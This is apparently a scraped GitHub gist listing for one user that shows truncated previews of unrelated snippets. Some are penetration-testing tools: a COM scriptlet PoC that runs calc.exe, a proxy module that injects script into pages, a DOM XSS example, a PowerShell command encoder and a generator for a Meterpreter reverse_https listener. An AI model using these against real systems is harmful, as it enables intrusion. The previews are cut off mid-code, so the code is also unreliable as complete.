Gabe Marshall gabemarshall

gabemarshall / xor.ps1
Last active November 1, 2023 11:17
Simple Encrypt and Decrypt with Powershell
# Not secure by any means, just a PoC for XOR'ing data using powershell
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption
$enc = [System.Text.Encoding]::UTF8
function xor {
param($string, $method)
$xorkey = $enc.GetBytes("secretkey")
if ($method -eq "decrypt"){
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
gabemarshall / widget.js
Created July 31, 2016 16:33
String literal for blessed-widgets
/**
* widget.js - high-level interface for blessed
* Copyright (c) 2013-2015, Christopher Jeffrey and contributors (MIT License).
* https://github.com/chjj/blessed
*/
var widget = exports;
widget['Node'] = widget['node'] = require('./widgets/node')
widget['Screen'] = widget['screen'] = require('./widgets/screen')
widget['Element'] = widget['element'] = require('./widgets/element')
gabemarshall / tmux.sh
Created April 19, 2016 00:04
Sample script to start a tmux session with a vertically split window
#!/bin/bash
SESSION=$USER
tmux -2 new-session -d -s $SESSION
# Setup a window
tmux new-window -t $SESSION:1 -n 'The Internet'
# Split the window vertically
tmux split-window -v
#!/bin/bash
# A fork of g0tmi1k's kali script
#-Metadata----------------------------------------------------#
# Filename: kali-rolling.sh (Update: 2016-04-08) #
#-Info--------------------------------------------------------#
# Personal post-install script for Kali Linux Rolling #
#-Author(s)---------------------------------------------------#
# g0tmilk ~ https://blog.g0tmi1k.com/ #
#-Operating System--------------------------------------------#
# Designed for: Kali Linux Rolling [x64] (VM - VMware) #
class InjectJS < Proxy::Module
def on_request( request, response )
if response.content_type =~ /^text\/html.*/
if response.headers =~ /MSIE/
response.body.sub!( '</title>', "</title><script type='text/javascript'></script>" )
end
end
end
end
gabemarshall / domxss.js
Created October 5, 2015 17:16
Dom based xss example
var debug = document.getElementById("subnav")
function _Debug_(p) {
p = p.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
var r = new RegExp("[\\?&]" + p + "=([^&#]*)"),
results = r.exec(location.search);
return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
}
if(location.search){
gabemarshall / Dockerfile
Created July 20, 2015 15:34
Dockerfile for VNC firefox "sandbox"
# Firefox over VNC
#
# VERSION 0.1
# DOCKER-VERSION 0.2
from ubuntu:12.04
# make sure the package repository is up to date
run echo "deb http://archive.ubuntu.com/ubuntu precise main universe" > /etc/apt/sources.list
run apt-get update
#!/usr/bin/env python
#
# Powerhell
#
# by Gabe Marshall
# base64 encodes command line argument to Windows PowerShell
#
# Heavily influenced by Carlos Perez's ps_encoder script (https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py)
import base64
gabemarshall / AutoListener.rb
Last active August 29, 2015 14:20
Simple ruby script to generate a metasploit rc file
#!/usr/bin/ruby
def meterpit(lhost, lport)
options = "use multi/handler\n"
options += "set payload windows/meterpreter/reverse_https\n"
options += "set LHOST #{lhost}\nset LPORT #{lport}\n"
options += "set ExitOnSession false\n"
options += "set AutoRunScript post/windows/manage/smart_migration\n"
options += "exploit -j\n"